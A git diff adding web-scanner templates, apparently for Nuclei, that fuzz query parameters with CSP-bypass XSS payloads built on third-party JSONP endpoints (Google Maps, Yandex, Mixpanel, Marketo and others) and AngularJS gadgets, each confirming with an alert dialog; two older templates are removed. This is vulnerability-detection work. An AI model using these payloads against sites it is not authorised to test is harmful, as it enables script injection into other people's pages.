diff --git a/dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml
new file mode 100644
index 00000000000..fc8c5c162f1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: lptag-liveperson-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via LivePerson Tag
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,liveperson
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://lptag.liveperson.net/lptag/api/account/1/configuration/applications/taglets/.jsonp?v=2.0&cb=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: lptag_liveperson_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "lptag_liveperson_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml
new file mode 100644
index 00000000000..c8f2bbe166e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: m-media-amazon-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Amazon Media
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,amazon
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="https://m.media-amazon.com/images/I/81cx8O4at9L.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: m_media_amazon_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "m_media_amazon_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml
new file mode 100644
index 00000000000..fbabd40e60e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: mango-buzzfeed-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via BuzzFeed Mango
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,buzzfeed
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://mango.buzzfeed.com/polls/service/editorial/post?poll_id=121996521&result_id=1&callback=alert(1)%2f%2f"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: mango_buzzfeed_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "mango_buzzfeed_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml
new file mode 100644
index 00000000000..055a3aa3aa0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: maps-api-ssl-google-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Maps API SSL
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://maps-api-ssl.google.com/maps/api/js?callback=alert(1337)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: maps_api_ssl_google_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "maps_api_ssl_google_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml
new file mode 100644
index 00000000000..4adb60ce618
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: maps-google-com-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Maps
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://maps.google.com/maps/api/js?sensor=false&callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: maps_google_com_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "maps_google_com_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml
new file mode 100644
index 00000000000..763c3684728
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: maps-google-de-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Maps DE
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://maps.google.de/maps/api/js?sensor=false&callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: maps_google_de_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "maps_google_de_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml
new file mode 100644
index 00000000000..319b94460b2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: maps-google-lv-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Maps LV
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://maps.google.lv/maps/api/js?sensor=false&callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: maps_google_lv_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "maps_google_lv_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml
new file mode 100644
index 00000000000..06669e312f2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: maps-google-ru-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Maps RU
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://maps.google.ru/maps/api/js?sensor=false&callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: maps_google_ru_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "maps_google_ru_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml
new file mode 100644
index 00000000000..7963c3d4700
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: maps-googleapis-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Maps API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://maps.googleapis.com/maps/api/js?callback=alert(1337)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: maps_googleapis_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "maps_googleapis_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml b/dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml
new file mode 100644
index 00000000000..f93be9aad40
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: marketo-app-sjint-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Marketo App SJINT
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,marketo
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: marketo_app_sjint_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "marketo_app_sjint_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml
new file mode 100644
index 00000000000..12967e9416e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: mc-yandex-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Yandex MC
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,yandex
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://mc.yandex.ru/watch/9528925/1?wmode=5&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: mc_yandex_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "mc_yandex_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml
new file mode 100644
index 00000000000..04aa67fd4ea
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: meetup-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Meetup API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,meetup
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.meetup.com/Toronto-Code-Mentoring/events?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: meetup_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "meetup_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/mi-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mi-csp-xss.yaml
deleted file mode 100644
index 94a7b8fc922..00000000000
--- a/dast/vulnerabilities/xss/csp/mi-csp-xss.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: mi-csp-xss
-
-info:
-  name: Content-Security-Policy Bypass via Mi
-  author: DhiyaneshDK
-  severity: high
-  reference:
-    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L3
-  metadata:
-    verified: true
-  tags: xss,csp-bypass,mi
-
-http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
-
-    payloads:
-      injection:
-        - '<script src="https://a.huodong.mi.com/postfree/postfree?callback=alert"></script>'
-
-    fuzzing:
-      - part: query
-        type: replace
-        mode: single
-        fuzz:
-          - "{{url_encode(injection)}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "{{injection}}"
-
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
-
-      - type: word
-        part: content_security_policy
-        words:
-          - "mi.com"
-          - "script-src"
-        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml
new file mode 100644
index 00000000000..90d56f30f7a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: mi-huodong-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Mi Huodong
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,mi
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://a.huodong.mi.com/postfree/postfree?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: mi_huodong_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "mi_huodong_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml
new file mode 100644
index 00000000000..9f9d9978605
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: microsoft-translator-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Microsoft Translator API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,microsoft
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.microsofttranslator.com/V2/Ajax.svc/GetLanguagesForTranslate?oncomplete=alert&appId=417CEAD93449502CC3C9B69FED26C54118E62BCC"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: microsoft_translator_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "microsoft_translator_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml
new file mode 100644
index 00000000000..e421bc694ba
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: mixpanel-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Mixpanel API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,mixpanel
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.mixpanel.com/track/?callback=alert(1337)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: mixpanel_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "mixpanel_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml
new file mode 100644
index 00000000000..1ec82002902
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: nominatim-openstreetmap-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via OpenStreetMap Nominatim
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,openstreetmap
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://nominatim.openstreetmap.org/search?q=&format=json&addressdetails=1&polygon_geojson=1&json_callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: nominatim_openstreetmap_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "nominatim_openstreetmap_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml b/dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml
new file mode 100644
index 00000000000..8b4cc510235
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: oamssoqae-ieee-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via IEEE OAMSSOQAE
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ieee
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://oamssoqae.ieee.org/ieeevendorsso/ssocookievalidator?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: oamssoqae_ieee_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "oamssoqae_ieee_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml
new file mode 100644
index 00000000000..000ad906817
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: olark-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Olark API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,olark
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.olark.com/2.0/visitors/z1nRAdDubyUjGyih018BZ0P04rBy00W3?_callback=alert&_method=PUT"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: olark_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "olark_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml b/dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml
new file mode 100644
index 00000000000..8009fdea74b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: openexchangerates-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via OpenExchangeRates
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,openexchangerates
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://openexchangerates.org/api/latest.json?app_id=4a363014b909486b8f49d967b810a6c3&callback=alert(document.domain)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: openexchangerates_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "openexchangerates_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml
deleted file mode 100644
index 05d1b99a9c9..00000000000
--- a/dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: ovoenergy-csp-xss
-
-info:
-  name: Content-Security-Policy Bypass via OvoEnergy
-  author: DhiyaneshDK
-  severity: high
-  reference:
-    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L99C1-L99C29
-  metadata:
-    verified: true
-  tags: xss,csp-bypass,ovoenergy
-
-http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
-
-    payloads:
-      injection:
-        - '<script src="https://js-smb.devices.ovoenergy.com/js-smb.min.js"></script><div ng-app><img src=x ng-on-error="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
-
-    fuzzing:
-      - part: query
-        type: replace
